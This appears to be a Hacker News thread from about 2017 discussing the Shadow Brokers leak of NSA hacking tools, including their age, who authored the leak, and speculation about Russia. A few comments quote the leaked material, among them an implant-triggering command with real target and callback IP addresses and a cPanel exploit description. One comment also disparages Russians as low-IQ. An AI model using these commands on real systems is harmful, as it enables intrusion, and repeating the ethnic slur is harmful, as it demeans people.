9 ms·
Snowden: NSA just lost control of its Top Secret arsenal of digital weapons
- theocean154 9y agoElegantEagle. nice
- cyberpunk 9y agoNo code though?
- iandanforth 9y agoCan someone remind me why Snowden would be in a position to comment on if this release comprises a full or partial set of hacking tools? Specifically, does this imply that his cache of data included a list of these tools, or was his day to day job one such that he would have been normally in contact with this toolset?
- perlgeek 9y ago> Can someone remind me why Snowden would be in a position to comment on if this release comprises a full or partial set of hacking tools? I wouldn't interpret that that tweet as "lost control of its full arsenal". It seems that say that, but then it's a tweet and length-limited. Maybe let's just wait until a more nuanced analysis surfaces?
- iandanforth 9y agoIt's further down in the thread: "Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library ..."
- iandanforth 9y agoReplying to self because I just got around to watching the movie. In his final days before the leak Snowden was part of the counter espionage cyber division as an NSA contractor. He was actively hacking and preventing hacks from China. These might not be part of the toolset he used, but its reasonable to believe he would have been aware of them and had access to them.
- willstrafach 9y agoI disagree with this. These tools appear to be for information collection, not offensive cyber operations.
- dmix 9y agoA) Snowden is not making that claim B) This dump is from 2013, not long after Snowden left, so still relevant to his knowledge on the subject. Although he wasn't trained for TAO.
- deleted 9y ago[deleted]
- tyingq 9y agoMore context: https://en.m.wikipedia.org/wiki/The_Shadow_Brokers https://en.m.wikipedia.org/wiki/The_Shadow_Brokers
- Nicksil 9y agoNon-mobile: https://en.wikipedia.org/wiki/The_Shadow_Brokers https://en.wikipedia.org/wiki/The_Shadow_Brokers
- tenaciousJk 9y agoHe goes on to further state: "Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal."
- remarkEon 9y agoI haven't read enough broken English to take a gander at what the native language is for the authors of that...manifesto. Anyone have a good guess? There's some pretty common mistakes throughout ("peoples" for people, "Americans' having" for "Americans have").
- anotherturn 9y agoIt's likely to have been run through an author obfuscation tool which mangles the language to avoid stylometry detection.
- remarkEon 9y agoI hadn't thought of that. Interesting.
- corndoge 9y agoMost likely an American trying to write in an Eastern European accent.
- tomjakubowski 9y agoYeah, it's so over the top that it reads like a native English speaker's intentional obfuscation.
- tyingq 9y agoI immediately thought of the "Opulence, I has it" commercials from DirecTV.
- cyphunk 9y agothis. and probably an american that had not lived outside the US long enough to notice how over the top the effort comes off as.
- pilsetnieks 9y agoThere's plenty of omitted articles (which is indicative of Slavic language speakers,) but at one point it devolves into a kind of caveman speak, so it's likely intentional.
- elastic_church 9y agoShadowBroker's blog posts always crack me up
- tertius 9y agohttp://pan.webis.de/clef17/pan17-web/author-obfuscation.html http://pan.webis.de/clef17/pan17-web/author-obfuscation.html
- elastic_church 9y agoYes, I'm aware, or, I speculate that ShadowBrokers are utilizing this to unduly burden Eastern Europeans, Russians and Chinese hackers but really, asymmetric information is asymmetric. We just don't know. But now we can speculate that they are American citizens, with their mention of voting for the US President.
- foepys 9y agoThey could also just lie to gain support from impressionable readers and/or disgruntled Trump voters.
- noobermin 9y agoEven if they did this, the content is rather funny. Hilarious that such people possess so much power yet they lack an informed understanding of the world around them. That, or it is propaganda. I'm going to side with the latter.
- deleted 9y ago[deleted]
- theocean154 9y agoLooking through some of the code and some of the docs, these look old. In absence of a lot of time or some missing docs, not sure how usable these things are.
- deleted 9y ago[deleted]
- NickSharp 9y agoFor example, this tool says: https://github.com/x0rz/EQGRP/blob/master/Linux/doc/user.tool.elatedmonkey https://github.com/x0rz/EQGRP/blob/master/Linux/doc/user.too... # ELATEDMONKEY is a local privelege escalation exploit against systems running the cPanel Remote Management Web Interface, at least through version 24, and probably future versions too (althogh that should be checked before throwing). It has been tested explicitly on cPanel 11.23.3 and 11.24.4 running CentOS 5.2 Linux -- Those versions are from 2008/2009
- cyberpunk 9y agoI wish I could say I'm unaware of a few thousand c5 machines still currently running prod and internet facing at just one of my previous clients; but I can't. These releases don't make things much worse than they were for those folks but let's not pretend there isnt a lot of unmaintained compute that this still applies to and that his is likely to change anytime soon. Don't underestimate the ability of failing smbs to dismiss the risks involved with that when they can't pay to fix it.
- Dolores12 9y agoIt's usable. If i remember correctly, Cisco have patched few vulnerabilities from their 'free' version of leaked files.
- toufka 9y ago/u/jvoisin on /r/netsec has a writeup: https://hackmd.io/s/r1gLMUUpx https://hackmd.io/s/r1gLMUUpx He notes that though much is targeted at older systems, a few things that look yet-unpatched.
- itchyjunk 9y agoAsking a president to do x,y or z by making this type of public statement probably implies it's geared towards the immediate readers and not some leader that might read it. The security agencies might have made a lot of enemy over the years so it's not clear who benefits from this. Either financially or as ego boost. The internet is definitely bigger that what most people might have predicted 20 years ago. So its not really a big surprising to see as much or even more power struggle than in real world battle fields. Since every side has a propaganda to peddle, I, personally can draw no reasonable or coherent conclusions on what type of decisions are shaping the world I live in. But I am nonetheless curious to see how this all plays out in the coming years. There is a related post on HN about this. [0] --------------------------------- [0] https://news.ycombinator.com/item?id=14066596 https://news.ycombinator.com/item?id=14066596
- kbenson 9y agoThe cynical and conspiracy theory believing person might suspect that regardless of all the reasons stated for the release the last one, namely the attack in Syria, is the only one that actually prompted this. I don't necessarily subscribe to the whole "Russia is controlling everything" line (there still so much that's unknown for sure), but it sure is easy to see a connection between Trump launching missiles against Syria which is supported by Russia, and with an embarrassing and costly release of secret information belonging to the security apparatus in the U.S. by what many people say is a front for the Russian security apparatus. Whether that connection is really there is another thing, but that narrative sure is easy to follow.
- suls 9y ago> [..] with an embarrassing and costly release of secret information belonging to the security apparatus in the U.S. by what many people say is a front for the Russian security apparatus. I have difficulties interpreting your statement. Are you implying US security services are "a front for the rudsian security apparatus"?
- kbenson 9y ago
- deleted 9y ago[deleted]
- sillysaurus3 9y agoIt's pretty fascinating to read the Shadow Broker's posts. They have to write something, since they can't just say "I work for Russia and we're reminding America that they're not invulnerable." So they have to come up with all sorts of contrived reasons about why they're doing this, complete with broken english to fool stylometry detection that walks the fine line between being believable and preposterous. Someone spent a lot of work getting it to look so terrible.
- roywiggins 9y agoAlternatively, they're someone else trying to look as if they're Russian-affiliated when they're not. "I work for Russia" would be unbelievable, so they sidle around trying to look suspiciously Russian without saying so.
- YooLi 9y agoWhy are you so certain they are Russian?
- snowpanda 9y agoIt's the popular thing to assume these days. It's also very insulting to Russian people in my opinion. But I guess it's ok to be prejudice towards some group of people but not others.
- DanBC 9y agoRussia uses online trolling as a tool. It's widely documented. This use of trolling leaves Russia open to accusations even when they're not involved. For a well documented case: http://www.stratcomcoe.org/internet-trolling-hybrid-warfare-tool-case-latvia-0 http://www.stratcomcoe.org/internet-trolling-hybrid-warfare-...
- paradite 9y agoWidely documented by "The NATO Strategic Communications Centre of Excellence", the most obvious enemy of Russia? Human rights violations in the U.S. are also well documented by China: http://blogs.wsj.com/chinarealtime/2015/06/26/china-issues-report-on-terrible-u-s-human-rights-record/ http://blogs.wsj.com/chinarealtime/2015/06/26/china-issues-r...
- fixxer 9y agoI don't know anything about the value of this crap, but I do find it interesting to grep through looking at the IPs (which I presume are compromised machines from which they are initiating attacks). See `./bin/pyside/targets.py`
- toufka 9y ago202.38.128.1 - http://ihep.ac.cn/ http://ihep.ac.cn/ - Chinese Academy of Sciences High Energy Physics 211.40.103.194 - http://utc21.co.kr http://utc21.co.kr - Korea from: https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript.txt#L728 https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript... #### JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT) #### ### Local window, let this sit and wait: ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1 ### on PITCH: set up window for nopen callback -nrtun 113
- hl5 9y agoObviously, Perl is the NSA top language choice due to it's built in support for obfuscation and job security.
- stonogo 9y agoSure. It couldn't be because perl is installed by default on all of the target platforms. Practicality trumps conference talks when there's work to be done, even in the government.
- nickpsecurity 9y agoAlthough you're joking, Perl was invented to make an NSA project easier to develop. That project was first, high-assurance VPN: BLACKER. It was also NSA's attempt to do something secure for once since they lost the argument to INFOSEC co-founder, Roger Schell, where they thought only communications security, not computer security, mattered. They contracted it to TRW who made a lot of secure stuff & government systems in general back then. Larry Walls was a smart, properly-lazy programmer working at TRW who wanted to make irritating parts of his job easier with better tools. The resulting tool, PERL, had much more impact than BLACKER VPN. ;) Whereas, the NSA's project failed initially because the team couldn't design a security kernel that had great security and acceptable performance. Told NSA they'd have to pick one. Schell told NSA he knew a guy with a design, GEMSOS, with both properties. NSA reluctantly used GEMSOS in BLACKER. The first, highly-secure VPN w/ general-purpose kernel was born. Who knows what the deployment or usability side of it was, though. Classification rules kept them from publishing on it for a decade or so where it then got paywalled. Classification is probably why Larry Walls didn't say much about BLACKER when describing its history. At least ones I read. http://ieeexplore.ieee.org/document/213253/?arnumber=213253 http://ieeexplore.ieee.org/document/213253/?arnumber=213253 http://www.cse.psu.edu/~trj1/cse443-s12/docs/ch6.pdf http://www.cse.psu.edu/~trj1/cse443-s12/docs/ch6.pdf
- Animats 9y agoThis stuff looks old. There are versions for Solaris and SCO Unix.
- cyberpunk 9y agoSolaris is still a valid target. Samsung have several datacentres running workloads on Solaris to the point where it made sense to buy Joyent. Don't you think finance running exadatas are probably worth targeting also?
- aiham 9y ago> $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); https://github.com/x0rz/EQGRP/blob/master/Linux/bin/xp_phpbb.pl#L62 https://github.com/x0rz/EQGRP/blob/master/Linux/bin/xp_phpbb...
- cyberpunk 9y agoThere is at least one very large bank (which I won't name) who is unable to move off ie6 for some internal apps which to my knowledge are still using this in some backoffices even today.... At least two years ago they were paying Microsoft less money than a rewrite would cost to support it so it kind of makes sense.... I only found that bad boy out after disabling some ciphers on some loadies which broke a lot of their stuff....
- mcintyre1994 9y agoFrom the Medium post linked (https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 https://medium.com/@shadowbrokerss/dont-forget-your-base-867...) - Don’t care if you swapped wives with Mr Putin, double down on it, “Putin is not just my firend he is my BFF”. - Don’t care if the election was hacked or rigged, celebrate it “so what if I did, what are you going to do about it”. This has got to be a fake group trying to discredit Trump right? I don't like him or what he's doing, but surely surely his supporters don't subscribe to at least the latter view there?
- doktrin 9y ago> surely surely his supporters don't subscribe to at least the latter view there? You must not have very many conservative friends on Facebook. "Russia didn't write the emails" has to be one of the most popular memes of the last 6 months.
- RodericDay 9y agoHow is that a "meme"? I don't know any conservatives but every single leftist I know thinks that russophobia is at absolutely deranged levels, as a vehicle for Clinton apologism. The idea that "Russia decided the election" is absurd, but repeated often enough, is starting to be taken as truth by those who find it palatable.
- grayhatter 9y ago'meme' just means idea/though that gets passed around. Coined by Dawkins to describe things like; "how to make fire", as a good meme that gets passed along.
- xenadu02 9y agoIf Hillary Clinton didn't have such high unfavorables it wouldn't have been a contest. If Bernie hadn't siphoned off some of her support it wouldn't have been a contest. Russian meddling and Comey's last-minute maneuver definitely cost her the election, but only by swinging the vote less than 1% in a few key states. I don't think Putin seriously believes he can control US elections and probably recognizes this as a one-off lucky break. The whole point for him is the PR value: having Trump claim elections are rigged is pure PR gold for Putin. Having Trump claim protesters are paid Democratic shills (rather than real people who don't like him) is Putin cover. He gets to point at those words and say "see, it's the same everywhere". It gives Putin supporters cover to believe his lies and it takes the wind out of the sails of Putin's detractors. My guess is Putin's original plan was to take advantage of Trump claiming he lost due to election rigging but we'll probably never know.
- akud 9y agoThe content reads pretty clearly like a native English speaker imitating immature hacker-speak. It comes across as if it were written by a script-kiddy; that may be intentional.
- dmix 9y agoThis is what everyone has been saying since last year when they first posted the auction...
- deleted 9y ago[deleted]
- bluecreator 9y agoNONE of you guys read poetry? This is a bend on "America", by Ginsberg. All coding and no poetry makes Jack a dull boy. Read it.
- Implicated 9y agoCare to elaborate on this? (No, I don't read poetry but I'm curious about the connection)
- pharrington 9y agoTo elaborate: https://www.poetryfoundation.org/poems-and-poets/poems/detail/49305 https://www.poetryfoundation.org/poems-and-poets/poems/detai...
- codezero 9y agoA lot of the scripts appear to have been written by the same person, or is that just me reading into it? They have a distinct comment style in both Python and Perl. Also, a lot of the tools appear to instruct people to paste various things in to them. I find it unlikely that a single person wrote all the tooling for the NSA, but, who knows.
- alkonaut 9y agoI noticed the same thing. And it's very informal, which surprised me. Would have expected this kind of documentation to be pretty dry.
- Harken 9y ago"We voted for you, comrade. Here is old malware from deepnet kiddy porn site post for to confuse." Could be Russia pissed about puppet twitching without permission, or could be Bannon (via Cambridge Analytics?) pissed about puppet twitching without permission. Twitch, puppet, twitch!
- daodedickinson 9y agoIf it's twitching without permission, it's not a puppet.
- daodedickinson 9y agoIf it's twitching without permission, it's not a puppet.
- mavdi 9y agoGiven the latest world events, I've personally come to realise that security agencies play an important role in keeping us safe, from external entities or from ourselves. This is disaster in my (current) opinion. We tend to dismiss the work the likes of NSA do, not thinking much about what would happen if they didn't do it. Snowden categorically dismissing anything that NSA does, just means he's a deluded idealist, much like I used to be.
- cyberpunk 9y agoI don't think he dismissed anything, he simply exposed what is currently happening. We make a kind of deal with our governments, some things we agree to be kept in the dark about for security reasons (specific intelligence or some clandestine operation or other) but I don't think that deal covers the kind of surveillance snowden exposed and I don't see at all how exposing the actions of our governments is deluded or idealistic: can you elaborate? Why would you prefer not to know what your government is doing when knowing doesn't break the 'willful ignorance' contract we entrust these people with?
- aub3bhat 9y agoI agree, to quote Mike from breaking bad. "Just because you shot Jesse James, don’t make you Jesse James.” Snowden is skilled at data theft and not a source of wisdom when it comes to surveillance. The liberal media (hate to use that term) is equally complicit. They have trotted him around as source of wisdom. The leaker of Pentagon Papers had a position that allowed him to asses the subject matter. Snowden on the other hand was a sysadmin.
- mavdi 9y agoIndeed we can either believe the world getting irreversibly worse after these leaks, is just a coinsidence, or somewhat related. A lot of people died, it would be naive to think snowden's actions didn't contribute to it. However noble his intentions might be.
- apeace 9y ago> Snowden categorically dismissing anything that NSA does That's not representative of Snowden's opinion at all. From the beginning he's always stated he believes in the mission of the intelligence agencies. Heck, he used to work for one. "I am not trying to bring down the NSA, I am working to improve the NSA" [0] [0] https://www.washingtonpost.com/world/national-security/edward-snowden-after-months-of-nsa-revelations-says-his-missions-accomplished/2013/12/23/49fc36de-6c1c-11e3-a523-fe73f0ff6b8d_story.html https://www.washingtonpost.com/world/national-security/edwar...
- cyphunk 9y agoA good time to remember the official US Intelligence Community statement and policy/lie on 0days, as given post-heartbleed: When Federal agencies discover a new vulnerability in commercial and open source software – a so-called “Zero day” vulnerability because the developers of the vulnerable software have had zero days to fix it – it is in the national interest to responsibly disclose the vulnerability rather than to hold it for an investigative or intelligence purpose. https://icontherecord.tumblr.com/post/82416436703/statement-on-bloomberg-news-story-that-nsa-knew https://icontherecord.tumblr.com/post/82416436703/statement-... https://news.ycombinator.com/item?id=7575802 https://news.ycombinator.com/item?id=7575802
- redahs 9y agoCould this problem be fixed by splitting the NSA into two competing agencies, one handling offensive signals intelligence, and one handling cryptography research and disclosures? Intuitively it seems when the same agency performs both roles it creates a conflict of interest and bias against disclosure.
- H4CK3RM4N 9y agoBut then your second branch ends up looking(to the government at least) a lot like a research program instead of anything meaningful in terms of intelligence.
- madez 9y agoResearch can be counter-intelligence, and thus intelligence.
- pstuart 9y agoHow about a third agency that focuses on securing our digital infrastructure?
- labster 9y agoThen we'd need a fourth agency to coordinate between them, and don't forget the fifth agency in charge of oversight.
- zengid 9y agoAll of this spy vs spy intrigue makes my head hurt
- jasonhansel 9y agoI wonder what this is for: https://github.com/x0rz/EQGRP/blob/master/Linux/bin/strangeFiles.py https://github.com/x0rz/EQGRP/blob/master/Linux/bin/strangeF... It looks like it's searching for files/directories with unusual names (like ". ") that system administrators wouldn't normally notice.
- geusebi 9y agoI remember (probably around 10 years ago) of a compromised server with a couple of strange files ". " and ".. ". After looking into it I realized that they were a ftp server and a process name changer. I would say your guess is correct, this script is probably used to spot weird file names which would pass unnoticed with a simple "ls".
- eps 9y agoLikely a response to the Syrian airbase tomahawking from a couple of days ago? Russians are known for what they themselves call "asymetrical answers", so this seems to fit the pattern.
- noobermin 9y agoHonestly though, how does leaking tools from the NSA whom Trump was suspicious of just a few weeks ago constitute an attack against him?
- oculusthrift 9y agoremember that 1000s of paid russians were used to interrupt our election on sites like reddit. wouldn't be surprised if a few leaked to this site. especially with green accounts.
- doktrin 9y agoHN is by now a well known forum, and exerting influence over its participants would be valuable for many parties; including but not necessarily limited to state actors. Hence, it's fair to assume that there are comments made in bad faith - particularly in highly visible political threads like this one. Identifying specific malicious actors (and their origin) is tricky from a reader's POV, so the best I can personally do is not let ridiculous statements go unanswered. Ignorance is more common than malice, but I'm sure there's a bit of both in here today.
- throwaway71960 9y ago| 1000s of paid russians were used to interrupt our election on sites like reddit you mean, using the weapon of free speech? you know, like Voice of America? And still the election went off, on schedule, with no interruptions.
- oculusthrift 9y agotwo green accounts with username number that is 2 away from each other. -__-
- throwaway71958 9y agoWhether there are Russian trolls on those forums, I have seen no proof of that. But there definitely are "Correct the Record" trolls all over social media, copy&pasting the liberal talking points, up/downvoting posts, and reporting anything that goes against the narrative as "hate speech", and there's a solid money trail in evidence of that as well.
- coldtea 9y ago>remember that 1000s of paid russians were used to interrupt our election on sites like reddit. Or so a 2017 version of the "red scare" goes, so that the military industrial complex can sell more weapons and more "safety", and the fingers can keep being pointed at some enemy or another. That way their budgets get approved, some poor countries pay the toll (who cares anyway), and they might even be able to plunder them afterwards. Worked wonders the last 30+ years. Not to mention that the US sponsors tons of NGOs, magazines, organizations, events, political parties, etc, with favorable views to its interest all over the world, and has done that none stop since at least WWII, meddling with elections, paying journalists, etc -- and when nothing else works.
- jorblumesea 9y agoIs there any doubt the Shadow Brokers are Russian and working for Russian interests? The timing of releases, international events concerning both countries and pointed measures are far too suspicious to be considered circumstantial.
- mirimir 9y agoSure, but that's what someone would do if they were trying to implicate Russians.
- trendia 9y agoMaybe they knew we'd think it odd for Russians to speak with a Russian accent so they did it anyway to trick us. "Are you the sort of man who would put the poison in his own goblet? Now a clever man would put the poison into my goblet, because he would know that only a fool would drink the goblet given to him. I am not a fool, so clearly you wouldn't do that. But you must have known that I was not a great fool, so I mustn't drink from the wine in front of me!" [0] [0] https://www.youtube.com/watch?v=U_eZmEiyTo0#t=1m20s https://www.youtube.com/watch?v=U_eZmEiyTo0#t=1m20s
- mirimir 9y agoYeah, pretty much. Except no poison drinking was involved here. Unless it was the NSA that did it. And of course, this was all old stuff, so it wasn't really very poisonous. But really, really, really. There's just no way to know.
- 0x38B 9y agoLike others are saying, there's a mismatch between the overall sentence structure and progression - which strikes me as more native - and the mistakes. I don't buy the verb misconjugation especially, a Russian ESL learner at that level would get that right more often than not. Source: many conversations with Russians learning English (also near-native Russian)
- r721 9y agoNicholas Weaver: "Overall, though, it looks like the auction file from Shadow Brokers is mostly a bust, better stuff in the free file." https://twitter.com/ncweaver/status/850797548717481984 https://twitter.com/ncweaver/status/850797548717481984 the grugq: "Calling it now: the first ShadowBrokers dump was an expensive signal. This latest one was not (expensive, that is.)" https://twitter.com/thegrugq/status/850825305845399552 https://twitter.com/thegrugq/status/850825305845399552
- joshschreuder 9y agoWhat does "expensive signal" mean in this context?
- chowell 9y agoHe expands in his Medium post from last year, here: https://medium.com/@thegrugq/the-great-cyber-game-commentary-2-33c9b79ca8ac https://medium.com/@thegrugq/the-great-cyber-game-commentary...
- deleted 9y ago[deleted]
- spydum 9y agoWhy is everybody posting/curious about the language of the blog post and not the contents of the file? I've looked through some of the contents.. Some look incredibly old, but others target odd things.. lots of cPanel. My only guess is take the low hanging fruit to build "jump box" type systems? Some odd examples: ElegantEagle/toffeehammer.. focuses on cgiecho for RCE. The thing is, a CVE was just released for this case maybe a month ago?: http://www.cvedetails.com/cve/CVE-2017-5613/ http://www.cvedetails.com/cve/CVE-2017-5613/ So if this dump was from 2013, why did the CVE recently pop up? Or is that coincidence?
- hnaparst 9y agoMany people may not be technically savvy enough to understand the contents of the file, but everyone is interested in who the author is. In fact, these exploits are rather old, but the identity of ShadowBrokers is fresh. And the idea that you can figure out where someone is from by analyzing their written text is as fascinating as doing the same to their code.
- mozey 9y ago> the idea that you can figure out where someone is from by analyzing their written text That idea is quite well known, so it's likely that the post was written like that deliberately. I was just wondering if you could create a similar sounding post with a chain of people rewriting the original in their own words.
- deleted 9y ago[deleted]
- hl5 9y agoRegardless of the source, full disclosure works. Whomever is responsible for releasing this material is also improving computer security for everyone. Thank you.
- shitgoose 9y agoshadowbrokerss remind me of this guy: https://www.youtube.com/user/FPSRussia https://www.youtube.com/user/FPSRussia 100% American from Georgia, sometimes loses Russian accent and slips into perfect English:)
- lngnmn 9y agoLooks like bullshit. It does not match the vault7 leak, which is supposed to be from the very same NSA. It is Russians. The classic example of Dunning Kruger effect. In a generally low IQ environment and primitive criminalized cultural environment they truly believe that what is enough to fool everyone around them, including the bosses (who are supposed to be really smart), will surely fool everyone else. This is the phenomenon of negative selection of a cancer-like corrupted society (which ran for a three decades already) at work. They are literally decades behind of the technological progress and culture of the modern civilization. They simply have no idea of what possible level of intelligence and sophistication could be found in places with decades of consistent high-IQ-based selection, like companies staffed with top 5% of MIT/Standford/Caltech/Berkeley graduates and what this kind of organization could do (think of Apple, Google, etc). A high-tech US govt agency would never had such a crap in their folders. They are not a bunch of disconnected from reality, overconfident, self-deluded with their own primitive propaganda Russian punks.
- strictnein 9y ago> "NSA just lost control of its Top Secret arsenal of digital weapons" This is just inaccurate, or at least purposefully misleading. The NSA did not just lose control of its "Top Secret arsenal of digital weapons". They "lost control" of mainly a bunch of old exploits whose release will not matter because anyone who is running this old junk won't be updating their servers because of this news.
- znfi 9y agoI have a bit of a hard time understanding why so many people think this is written by Russians. Obviously the grammar is not correct, but it would seem very strange to think this has any significance, and it seems more plausible that it was done in an attempt to hide the authors identity. (My spontaneous feeling was that it was written by Jar Jar Binks, and not Russians, for whatever that's worth.) I'm not from the US and have not followed the news from there recently, but from what little I have seen much of the actual contents of the message does seem to reflect the feelings of Trumps "base"? Or would people more familiar with US politics say this is incorrect?
- i336_ 9y agoExcuse me while I just... ALLL RIIIIGHT!! Not because I'm especially interested in the tools (although, granted, I have not had a look at any of them yet), but because I always wished this could be given to everyone. Also, for a moment there, I was concerned 7z was insecure and that the passphrase had been bruteforced. Apparently not! Very nice.